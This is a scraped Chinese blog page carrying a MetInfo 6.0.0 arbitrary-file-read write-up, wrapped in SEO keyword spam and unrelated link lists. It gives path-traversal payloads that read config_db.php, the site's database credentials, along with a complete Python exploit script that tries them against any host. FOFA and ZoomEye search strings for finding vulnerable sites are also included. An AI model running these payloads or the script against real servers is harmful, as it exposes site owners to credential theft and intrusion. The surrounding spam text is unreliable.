当前位置: 首页 > news >正文

做网站公司 陕西渭南蚌埠网站建设网站

news 2026/4/30 9:28:53
做网站公司 陕西渭南,蚌埠网站建设网站,网页设计与制作期末考试试题及答案,50个市场营销经典案例感谢互联网提供分享知识与智慧#xff0c;在法治的社会里#xff0c;请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现代码审计漏洞点 1.5、深度利用EXP编写 1.6、漏洞挖掘1.7修复建议 1.1、漏洞描述 漏洞名称#xff1a;MetInfo任意文件… 感谢互联网提供分享知识与智慧在法治的社会里请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现代码审计漏洞点 1.5、深度利用EXP编写 1.6、漏洞挖掘1.7修复建议 1.1、漏洞描述 漏洞名称MetInfo任意文件读取 漏洞简介MetInfo是一套使用PHP和MySQL开发的内容管理系统其中的/app/system/include/module/old_thumb.class.php文件存在任意文件读取漏洞攻击者可利用该漏洞读取网站的敏感文件。 下载地址历史版本安装文件下载 Ver_6.0.0 1.2、漏洞等级 高危 1.3、影响版本 影响版本MetInfo 6.0.0 1.4、漏洞复现 代码审计 defined(IN_MET) or exit(No permission);load::sys_class(web);class old_thumb extends web{public function doshow(){global $_M;$dir str_replace(array(../,./), , $_GET[dir]);if(substr(str_replace($_M[url][site], , $dir),0,4) http strpos($dir, ./) false){header(Content-type: image/jpeg);ob_start();readfile($dir);ob_flush();flush();die;}$dir str_replace(array(‘…/’,‘./’), ‘’, $_GET[‘dir’]); dir变量接受来自$_GET[‘dir’]传递进来的值用了str_replace函数做替换将.././替换成空值 readfile($dir); 漏洞点 /include/thumb.php使用bp进行抓包 测试一 /include/thumb.php?dir..././http/..././config/config_db.php测试二 /include/thumb.php?dir.....///http/.....///config/config_db.php测试三 /include/thumb.php?dirhttp/.....///.....///config/config_db.php测试四 /include/thumb.php?dirhttp\..\..\config\config_db.php# 此POC 仅适用于Windows 系统Linux 下无效 # 只有windows以右斜杠作为文件路径分隔符1.5、深度利用 EXP编写 import requests import sysbanner MetInfo 6.0.0___________.__.__ __________ .___\_ _____/|__| | ____ \______ \ ____ _____ __| _/| __) | | | _/ __ \ | _// __ \\__ \ / __ | | \ | | |_\ ___/ | | \ ___/ / __ \_/ /_/ | \___ / |__|____/\___ |____|_ /\___ ____ /\____ | \/ \/ \/ \/ \/ \/ Usage: python3 *.py http://192.168.80.139/MetInfo6.0.0/ headers {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 }dir_list [..././http/..././config/config_db.php,.....///http/.....///config/config_db.php,http/.....///.....///config/config_db.php,http\..\..\config\config_db.php ]def attack(host):vul /include/thumb.phpurl host vulres requests.get(url url, headers headers)if res.status_code ! 200:print(f[INFO] {vul} is Not Exists!)exit()print(f[INFO] {vul} is Exists!)for param in dir_list:params {dir: param }res requests.get(url url, params params, headers headers)print(f[INFO] Test URL: {res.url})if ?php in res.text:print([RESULT] The target is vulnreable!)print(f[RESULT]\n{res.text})breakif len(sys.argv) 2:print(banner)exit()host sys.argv[1]attack(host host)1.6、漏洞挖掘 FOFA appmetinfoZoomEye app:MetInfo app:MetInfoos:Windows1.7修复建议 升级打补丁
http://www.hkea.cn/news/14473280/

相关文章:

  • 四会网站建设做相册的网站 网易
  • 简述企业网站建设的目的有哪些校园推广app
  • 做网站用什么开发好二级域名网站查询
  • 苏州微信网站中国企业500强都有哪些企业
  • 做7寸照片的网站网站集约化建设的建议
  • 资兴市建设局网站wordpress 是什么
  • 门户网站建设及运营社交网站开发意义
  • 长域名的优秀网站湖南省郴州市永兴县邮政编码
  • 网站建设服务商推荐网站开发详细设计模板
  • 网站营销怎么做一个简单的网页代码带图片
  • 微擎怎么做网站怎样在亚马逊上开自己的店铺
  • 企业网站建设能解决什么问题网页广告素材
  • 常州seo网站推广wordpress创建公告
  • 深圳罗湖住房和建设局网站家装建材公司网站建设
  • 汝州市住房和城乡规划建设局网站广州建设总承包集团
  • 网站 建设 内容 安排做搜狗手机网站
  • 深圳专业网站设计专业定制网页制作软件下载
  • 内网建站教程手机网站怎么改成电脑版
  • 网站后台管理系统框架网站 制作价格表
  • 网站 图文混编wordpress 图片列表
  • 响应式网站 框架树荫营销网站
  • 宁波网站建设小程序开发新密网站
  • 自己做网站怎么编代码贵州省城乡建设局网站查
  • 一站式做网站公司免费代理游戏
  • 太原高端网站建设重庆网站建设外包哪家好
  • 制作网站网站视频发布播放网站建设
  • 陕西省建设协会岗位证查询网站动漫设计的就业前景
  • 视频盗版网站怎么做陕建云采电子商务平台
  • 重庆市网站备案联合年检在什么网站做
  • 专业建站报价网站设计制作的连接方式